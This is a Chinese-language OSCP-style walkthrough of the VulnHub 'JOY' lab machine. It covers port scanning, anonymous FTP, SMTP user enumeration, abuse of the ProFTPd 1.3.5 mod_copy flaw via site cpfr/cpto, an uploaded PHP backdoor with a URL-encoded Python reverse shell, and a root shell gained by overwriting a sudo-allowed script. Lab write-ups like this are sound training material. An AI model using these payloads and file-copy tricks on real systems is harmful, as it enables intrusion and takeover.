公众号:泷羽Sec-尘宇安全
前言
oscp备考,oscp系列——JOY靶场,信息收集,ProFTPd: 1.3.5远程命令执行漏洞,信息收集+ProFTPd: 1.3.5漏洞提权
难度简单
- 对于低权限shell获取涉及:信息收集,ProFTPd: 1.3.5远程命令执行漏洞
- 对于提权:信息收集+ProFTPd: 1.3.5漏洞提权
下载地址:
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
nmap
主机发现
└─# nmap -sn 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:20 CST
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:16 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00017s latency).
MAC Address: 08:00:27:C3:F3:FA (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.00049s latency).
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.104
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.84 seconds
端口扫描
└─# nmap --min-rate 10000 -p- 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:21 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 192.168.56.105
Host is up (0.00043s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 40.45 seconds
└─# nmap --min-rate 10000 -p- 192.168.56.105 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:22 CST
Warning: 192.168.56.105 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.105
Host is up (0.0011s latency).
Not shown: 65454 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
123/udp open ntp
137/udp open netbios-ns
161/udp open snmp
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 72.96 seconds
详细端口扫描
└─# nmap -sV -sT -sC -O -p$ports 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:23 CST
Nmap scan report for 192.168.56.105
Host is up (0.00082s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: TOP STLS SASL PIPELINING CAPA AUTH-RESP-CODE UIDL RESP-CODES
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE ID LOGIN-REFERRALS have post-login Pre-login ENABLE capabilities IMAP4rev1 listed STARTTLS SASL-IR LOGINDISABLEDA0001 LITERAL+ more OK
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_imap-capabilities: ID LOGIN-REFERRALS more have Pre-login ENABLE capabilities IMAP4rev1 post-login listed SASL-IR IDLE LITERAL+ AUTH=PLAINA0001 OK
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP USER SASL(PLAIN) PIPELINING CAPA AUTH-RESP-CODE UIDL RESP-CODES
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-02-18T15:23:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2025-02-18T23:23:43+08:00
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.60 seconds
信息收集
ftp,21
nmap扫描发现
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
登录查看一下
感觉文件有点多,递归下载一下
wget -r ftp://192.168.56.105:21
查看一下
└─# cat *
Patrick's Directory
total 148
drwxr-xr-x 18 patrick patrick 4096 Feb 19 00:05 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 24 Feb 19 00:05 1imQukyUK19Pl17qXfEYUVMtwzBfku5QbhxrPQJCkJoJJt5IfcwbDXmdIsEcHIKl.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:15 4Cj4XhDr2jsgd2zlJF73yPgMLihZlQs5BZ4KG7Z4Kot7evmPzbkfFjdLMAYATxIt.txt
-rw-r--r-- 1 patrick patrick 0 Feb 19 00:00 5tA4ZOUkrV7KTBdkSYXSxnAH1s3CXqdm.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:35 9ezdGG9hlWdEstBKVHwhH135FuhXcesZ.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:50 9yw2FYOlL3kPJOYCvyE5J1udgeNGVOsSC2sRMxFLsS4EwZRFqVWC691lBQCY7IcW.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:25 akzHGaS5Fvs51NWKaMoYqTDugJWwTthz.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:55 Bo0WZoYeqzJRni8rqeJNaIJONypltxP5.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:25 BsJPUK1ErX1VD2pQpslLrVLsodufgwLnKxl2dnwCeZ003rImlgwt03qazky8q4ov.txt
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:20 Drog8FITLbe50UcOIkVg8mMoWMPcLxD1qzhXZackYv6vmIgIYqzMk6oNS1AUf0gh.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:45 DXwuAUIO4hTtHfSUX70BsOOZw6KaxOwjcec0Z1lZPFiGNGe8bdzIr2lvYXSa8IRW.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:15 EFHNIz6Jhbi9Wz6FkZoINkqTCEt9wTJX.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:50 iK0PkNFU2txJbSkcGJ96inhla94CT8dn.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:35 IkQp812B6MANVspW9yIeKZmIlC8blULu7U2hZNxtrw3nnNHV5CH7nQa9nqMKfbjk.txt
-rw-r--r-- 1 patrick patrick 24 Feb 19 00:00 jsHyHpJxTeKqXbdislyT182MZlnL7y5Y7TDATWPDDWEKazDqeycSHqh4jhhHXQhk.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:55 qeMAXlcBL3RYd5fYRzSCfzrYxlkOTRNghwD7OXyGh4Jtc2bnQ4Rm7HtuVe50Iq5H.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:20 SVVa34bwxkTdPwBdMBsJAxu72xi9lONd.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:40 tZocedGOcVcSmUdfwby7gSs3gqKTEJbef5Xam3J8OrIcf1FME3JgfwLEIErMYUZf.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:30 UsAr9HtRbwqLJxQEashDN6x99kiX9C1k.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:40 xpk7hnbm1QK8AqXKFrNpg1VGtU19PJOC.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:30 YLau2QcLUAuXioJ9B2RFV5OGYWkB7wV5HWv9KSEo1jvw5Ul31x7WGDOyDx7tFWUW.txt
-rw-r--r-- 1 patrick patrick 0 Feb 19 00:05 yPA7qqLRtqTSloMkQXT2YXiy9rnytR2v.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:45 Zqt7ERU4rlPrerglGeJQhs4aElSmcd6F.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
This is a brave project!
What happens when you have no idea what you are doing? Bang your head against the wall.
colour
airline
skilled footballer!
Perhaps the head of development is secretly a sicko...
either a dog name, or the name of a lottery in singapore
ONE!
wine app
you only live once!
dog
cat
ant
bird
fish
hare
snake
mouse
eagle
rabbit
jaguar
python
penguin
peacock
phoenix
kangaroo
parakeet
mosquito
mousedeer
woodlouse
cockroach
kingfisher
rhinoceros
pondskater
Lock down this machine!
全部看了一下,都没有什么有用的信息,只有Directory文件的内容,一个名为version_control文件可以关注一下
根据用户名称,猜测路径是:/home/patrick/version_control,使用telnet将文件先复制到ftp下面的download文件夹:/home/ftp/download/
telnet 192.168.56.105 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/download/version_control
telnet和ftp命令的区别:
telnet连接后,用户主机实际成为远程TELNET服务器的一个虚拟终端(或称是哑终端),一切服务完全在远程服务器上执行,但用户决不能从远程服务器中下载或上传文件,或拷贝文件到用户主机中来。
ftp则不同,它是采用客户机/服务器模式,用户能够操作FTP服务器中的目录,上传或下载文件,但用户不能请求服务器执行某个文件。
然后下载一下
查看一下,发现版本是
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
而且暴露了网站的根目录
/var/www/tryingharderisjoy
stmp,25
└─# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.56.105
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 175
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Feb 19 00:20:02 2025 #########
192.168.56.105: _apt exists
192.168.56.105: avahi exists
192.168.56.105: backup exists
192.168.56.105: bin exists
192.168.56.105: colord exists
192.168.56.105: daemon exists
192.168.56.105: dnsmasq exists
192.168.56.105: games exists
192.168.56.105: ftp exists
192.168.56.105: gnats exists
192.168.56.105: geoclue exists
192.168.56.105: hplip exists
192.168.56.105: irc exists
192.168.56.105: list exists
192.168.56.105: lp exists
192.168.56.105: man exists
192.168.56.105: mail exists
192.168.56.105: messagebus exists
192.168.56.105: news exists
192.168.56.105: mysql exists
192.168.56.105: nobody exists
192.168.56.105: ntp exists
192.168.56.105: postfix exists
192.168.56.105: postmaster exists
192.168.56.105: pulse exists
192.168.56.105: proxy exists
192.168.56.105: root exists
192.168.56.105: ROOT exists
192.168.56.105: rtkit exists
192.168.56.105: saned exists
192.168.56.105: speech-dispatcher exists
192.168.56.105: sync exists
192.168.56.105: sys exists
192.168.56.105: systemd-bus-proxy exists
192.168.56.105: systemd-network exists
192.168.56.105: systemd-timesync exists
192.168.56.105: systemd-resolve exists
192.168.56.105: usbmux exists
192.168.56.105: uucp exists
192.168.56.105: www-data exists
######## Scan completed at Wed Feb 19 00:20:03 2025 #########
40 results.
175 queries in 1 seconds (175.0 queries / sec)
提取一下
awk -F ' ' '{print $2}' user>u
得到一些用户名
Processes
file
count
count
TCP
timeout
domain
Scan
_apt
avahi
backup
bin
colord
daemon
dnsmasq
ftp
geoclue
games
gnats
hplip
irc
list
lp
mail
man
messagebus
mysql
news
nobody
ntp
postfix
postmaster
proxy
pulse
root
ROOT
rtkit
saned
speech-dispatcher
sync
sys
systemd-bus-proxy
systemd-resolve
systemd-network
systemd-timesync
usbmux
uucp
www-data
Scan
results.
queries
web页面,80
搜索一下,发现只有一个拒绝服务漏洞
目录扫描
看了一遍没有发现有用的信息
smb,139&445
得到一些用户名
Administrators
Users
Guests
Power
Account
Server
Print
patrick
ftp
nobody
None
感觉都没有什么用
漏洞利用
ftp,ProFTPd: 1.3.5远程命令执行漏洞
通过之前获得的版本,搜索一下发现存在一个远程命令执行漏洞
不过这些脚本都利用不成功,网上搜索了一下发现
https://github.com/t0kx/exploit-CVE-2015-3306
成功上传木马,其实之前就用到了这个漏洞,
site cpfr和site cpto命令读取和写入任意文件
python exploit.py --host 192.168.56.105 --port 21 --path "/var/www/tryingharderisjoy"
查看一下
进行反弹shell
http://192.168.56.105/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.104%22,6666));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27
成功反弹shell
提权
信息收集
看了一下内核,发现比较高,放弃内核提权,进行信息搜集,在网站的根目录下面发现一个文件,里面有一些账号信息
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
切换一下用户,发现只有patrick的密码是对的
使用sudo -l,发现在/home/patrick/script/test是免密的,不过没有权限
还是要用到ProFTPd: 1.3.5这个漏洞
site cpfr和site cpto命令读取和写入任意文件
本来先执行替换/etc/passwd,不过失败了,还是替换/home//patrick/script/test文件吧
首先先通过ftp上传一个执行文件
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
在使用telnet转换一下路径
telnet 192.168.56.105 21
site cpfr /home/ftp/download/test
site cpto /home/patrick/script/test
扫一扫
1398
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
